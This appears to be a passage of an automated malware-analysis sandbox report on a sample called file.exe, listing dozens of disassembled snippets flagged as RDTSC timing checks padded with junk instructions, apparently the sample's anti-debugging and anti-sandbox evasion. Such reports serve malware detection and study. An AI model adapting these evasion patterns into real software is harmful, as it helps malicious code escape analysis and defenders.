Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66AE6B second address: 66AEA7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7E2CD3B849h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7E2CD3B841h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F7E2CD3B84Dh 0x00000019 jc 00007F7E2CD3B836h 0x0000001f jmp 00007F7E2CD3B841h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66AEA7 second address: 66AEBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F7E2CC83CA0h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B144 second address: 66B14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7E2CD3B836h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66B14F second address: 66B16D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67190F second address: 67192D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F7E2CD3B846h 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67192D second address: 671947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7E2CC83CA3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 671947 second address: 67194D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DC2C2 second address: 5DC2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DC2CA second address: 5DC2D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6704F6 second address: 670500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 670500 second address: 67050A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7E2CD3B836h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67050A second address: 670518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 670518 second address: 67051C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 670668 second address: 670689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007F7E2CC83CA8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 670AD1 second address: 670AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 670AD6 second address: 670AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CC83C9Dh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F7E2CC83C9Eh 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6758B9 second address: 6758BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 674AD8 second address: 674AFB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F7E2CC83CA7h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 674AFB second address: 674B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B83Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 674B0A second address: 674B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 674C94 second address: 674CA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 674CA0 second address: 674CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 674CA4 second address: 674CE1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F7E2CD3B845h 0x0000000f jmp 00007F7E2CD3B83Bh 0x00000014 jmp 00007F7E2CD3B840h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 674E3E second address: 674E49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 674E49 second address: 674E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 674E56 second address: 674E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 674E5A second address: 674E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6752A3 second address: 6752BD instructions: 0x00000000 rdtsc 0x00000002 js 00007F7E2CC83C96h 0x00000008 jnc 00007F7E2CC83C96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F7E2CC83C96h 0x00000018 push esi 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6752BD second address: 6752C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67D769 second address: 67D777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F7E2CC83CA2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67D777 second address: 67D77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67C34A second address: 67C35B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67C35B second address: 67C360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67CB75 second address: 67CB79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D1EA5 second address: 5D1ECA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Eh 0x00000007 jmp 00007F7E2CD3B83Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D1ECA second address: 5D1EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F7E2CC83C9Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67CE8A second address: 67CEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F7E2CD3B848h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67CEA7 second address: 67CEC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA3h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67D4F1 second address: 67D502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7E2CD3B836h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67D502 second address: 67D508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67D508 second address: 67D50C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680868 second address: 68086E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6809DF second address: 6809E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6809E3 second address: 6809F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6809F9 second address: 680A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007F7E2CD3B836h 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680A07 second address: 680A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7E2CC83CA0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680A33 second address: 680A5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B847h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jns 00007F7E2CD3B842h 0x00000012 jbe 00007F7E2CD3B836h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680D0A second address: 680D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6810F8 second address: 6810FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6810FC second address: 68110E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F7E2CC83C9Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 681252 second address: 681256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 681256 second address: 68126B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E2CC83C9Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68126B second address: 681277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jbe 00007F7E2CD3B836h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 681277 second address: 681287 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F7E2CC83C9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C436 second address: 68C43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C43C second address: 68C440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C440 second address: 68C444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C444 second address: 68C44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C716 second address: 68C725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B83Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CA27 second address: 68CA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CBCD second address: 68CBEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7E2CD3B83Bh 0x0000000c jno 00007F7E2CD3B836h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CBEF second address: 68CC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7E2CC83C96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F7E2CC83C96h 0x00000013 jmp 00007F7E2CC83CA6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CC18 second address: 68CC1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CC1C second address: 68CC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F7E2CC83C96h 0x00000010 jnp 00007F7E2CC83C96h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CC32 second address: 68CC55 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007F7E2CD3B836h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F7E2CD3B843h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68CEF0 second address: 68CF11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F7E2CC83CA9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68D196 second address: 68D19D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68D19D second address: 68D1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CC83CA5h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push esi 0x0000000d jnc 00007F7E2CC83C96h 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 push edx 0x0000001a pop edx 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68D1CB second address: 68D1E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CD3B843h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A77D4 second address: 6A77F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CC83CA8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A77F0 second address: 6A7830 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E2CD3B84Dh 0x00000008 jmp 00007F7E2CD3B847h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F7E2CD3B84Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A731C second address: 6A7320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7320 second address: 6A7326 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ABF0E second address: 6ABF18 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C0CEC second address: 6C0CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C10DD second address: 6C10F5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E2CC83C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7E2CC83C9Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C10F5 second address: 6C10F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C10F9 second address: 6C10FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C1256 second address: 6C128B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B846h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jl 00007F7E2CD3B836h 0x00000013 jmp 00007F7E2CD3B83Dh 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C1609 second address: 6C160F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C160F second address: 6C1613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C1613 second address: 6C1617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C1617 second address: 6C1628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CD3B83Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C1628 second address: 6C1666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CC83CA7h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jc 00007F7E2CC83CB3h 0x00000013 jmp 00007F7E2CC83CA7h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C17D9 second address: 6C17F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B843h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3AC2 second address: 6C3AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3AC7 second address: 6C3B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007F7E2CD3B84Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F7E2CD3B836h 0x00000018 jmp 00007F7E2CD3B83Eh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3B04 second address: 6C3B14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F7E2CC83C96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C7429 second address: 6C742F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CA523 second address: 6CA53F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7E2CC83C9Eh 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F7E2CC83C96h 0x00000016 pop edi 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2445 second address: 6D244D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D244D second address: 6D246F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F7E2CC83C96h 0x0000000f jmp 00007F7E2CC83C9Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2289 second address: 6D228F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D228F second address: 6D22A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F7E2CC83C9Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E16D4 second address: 6E16EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jno 00007F7E2CD3B83Ch 0x0000000b js 00007F7E2CD3B83Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E16EF second address: 6E1708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 js 00007F7E2CC83C96h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 jc 00007F7E2CC83C98h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E1593 second address: 6E15A0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E2CD3B838h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E431E second address: 6E4336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CC83CA4h 0x00000009 rdtsc
